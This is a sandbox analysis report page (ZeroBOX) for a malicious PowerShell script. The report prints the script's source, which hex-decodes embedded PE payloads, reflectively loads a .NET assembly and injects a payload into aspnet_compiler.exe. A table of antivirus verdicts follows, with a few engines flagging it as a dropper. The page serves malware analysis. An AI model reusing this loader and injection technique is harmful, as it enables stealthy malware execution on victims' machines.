popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
Function alosh {
[CmdletBinding()]
[OutputType([byte[]])]
param(
[Parameter(Mandatory=$true)] [String]$UJHNNVCCGGSX
$URXXXZA = New-Object -TypeName byte[] -ArgumentList ($UJHNNVCCGGSX.Length / 2)
for ($i = 0; $i -lt $UJHNNVCCGGSX.Length; $i += 2) {
$URXXXZA[$i / 2] = [Convert]::ToByte($UJHNNVCCGGSX.Substring($i, 2), 16)
return [byte[]]$URXXXZA
[String]$H4 = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103007C93CED40000000000000000E0000E210B01300000B200000006000000000000AED100000020000000E00000000040000020000000020000040000000000000004000000000000000020010000020000000000000300408500001000001000000000100000100000000000000F000000000000000000000060D100004B00000000E000009402000000000000000000000000000000000000000001000C0000001DD100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000B4B100000020000000B2000000020000000000000000000000000000200000602E727372630000009402000000E000000004000000B40000000000000000000000000000400000402E72656C6F6300000C000000000001000002000000B800000000000000000000000000004000004200000000000000000
[Byte[]]$H5=alosh $H4
[String]$Server = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000838D6EB7C7EC00E4C7EC00E4C7EC00E404E35FE4C6EC00E4CE9484E4C6EC00E404E35DE4C5EC00E4E02A6DE4C6EC00E4E02A6EE4C4EC00E4C2E00FE4C6EC00E4CE9483E4C3EC00E4CE9493E4D8EC00E4C7EC01E435EC00E4548509E5B0EC00E4548502E5C6EC00E452696368C7EC00E400000000000000000000000000000000504500004C01050072EC455F0000000000000000E00002010B010E10005201000050140000000000285E000000100000007001000000400000100000000200000500010000000000050001000000000000E01500000400000000000002004085000010000010000000001000001000000000000010000000000000000000000084AA01002C01000000000000000000000000000000000000000000000000000000B01500E011000030A901001C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000070010090030000000000000000000000000000000000000000000000000
[Byte[]]$H1=alosh $Server
[Reflection.Assembly]::'Load'($H5).'GetType'('VBNET.PE').'GetMethod'('Run').'Invoke'($null,[object[]] ( 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe',$H1))
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Downloader!gm
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast SNH:Script [Dropper]
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Emsisoft Clean
Comodo Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Sophos Clean
Ikarus Trojan-Dropper.PS.Agent
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Clean
Cynet Clean
AhnLab-V3 Clean
McAfee Clean
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG SNH:Script [Dropper]
Panda Clean
Qihoo-360 Clean
No IRMA results available.